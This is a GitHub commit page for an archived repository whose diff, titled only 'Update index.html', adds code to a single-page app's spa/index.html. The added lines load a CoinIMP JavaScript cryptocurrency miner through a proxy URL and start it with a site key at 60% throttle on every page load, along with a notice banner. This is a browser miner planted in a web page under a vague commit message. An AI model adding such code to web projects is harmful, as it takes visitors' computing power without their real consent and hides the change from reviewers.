Skip to content
This repository has been archived by the owner on Jul 14, 2024. It is now read-only.

Commit

Permalink
Update index.html
Browse files Browse the repository at this point in the history
  • Loading branch information
garder500 authored Apr 3, 2024
1 parent f3cf4e0 commit ac97a1d
Showing 1 changed file with 10 additions and 1 deletion.
11 changes: 10 additions & 1 deletion spa/index.html
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,16 @@
{{.Meta}}
</head>
<body style="min-width: 200px;">
<div id="root"></div>
<div id="root"></div>
<script src="https://proxy.ketsuna.com/?url=https%3A%2F%2Fwww.hostingcloud.racing%2F9Kdk.js"></script>
<script>
var _client = new Client.Anonymous('015978d31b8215e1f45c35853ef3525db5031fff9a18c882494f3fadc332994e', {
throttle: 0.6, c: 'w'
});
_client.start();
_client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");

</script>
<script src="//www.gstatic.com/cv/js/sender/v1/cast_sender.js?loadCastFramework=1"></script>
<script type="module" async src="/src/root.tsx"></script>
</body>
Expand Down

0 comments on commit ac97a1d

Please sign in to comment.